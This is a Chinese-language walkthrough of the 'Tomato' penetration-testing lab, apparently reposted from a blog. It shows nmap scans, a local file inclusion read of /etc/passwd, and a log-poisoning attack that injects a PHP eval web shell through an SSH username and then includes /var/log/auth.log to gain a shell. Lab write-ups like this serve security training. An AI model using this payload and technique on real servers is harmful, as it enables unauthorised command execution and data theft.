您的位置:首页 > 教育 > 锐评 > tomato 靶场

tomato 靶场

2024/10/6 0:34:48 来源:https://blog.csdn.net/weixin_63988455/article/details/140777883  浏览:    关键词:tomato 靶场

1.主机发现  扫描ip及端口

2.端口扫描 nmap192.168.233.131  有三个开放的端口nmap -sC -sV -O  192.168.233.131

-sC常见漏洞脚本扫描 -sV开放端口服务/版本号 -O操作系统探测

3.目录扫描

DIRECTORY: http://192.168.233.131/antibot_image/
+ http://192.168.233.131/index.html (CODE:200|SIZE:652)                     
+ http://192.168.233.131/server-status (CODE:403|SIZE:280)  

namp没全扫出来

4.访问192.168.233.131:8888 发现有个登录框 但是没啥子用

5.访问antibot_image目录 http://192.168.233.131/antibot_image/

继续访问一下antibots/目录 感觉这个跟爬虫的差不多

这个info.php

6.查看info.php的网页源码,发现存在文件包含漏洞

7.在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

看这个发现端口没全部扫出来  再用这个扫一下nmap -A 192.168.233.131 -p-

-A: 这个选项启用了“侵略性扫描”,包括操作系统检测、版本检测、脚本扫描和跟踪路由等功能。侵略性扫描通常会提供更多的信息,但也可能引起目标系统的注意。

-p-: 这个选项告诉 nmap 扫描目标系统上的所有可能的端口。扫描所有端口可能会耗费一定的时间,但可以全面了解目标系统上开放的哪些端口,以及哪些端口可能存在漏洞。

还有个2211端口 可以ssh

ssh "<?php @eval($_POST['cmd']);?>"@192.168.233.131 -p 2211

然后在网页端查看ubuntu报错信息:/var/log/auth.log

/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录。

成功getshell
                        

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com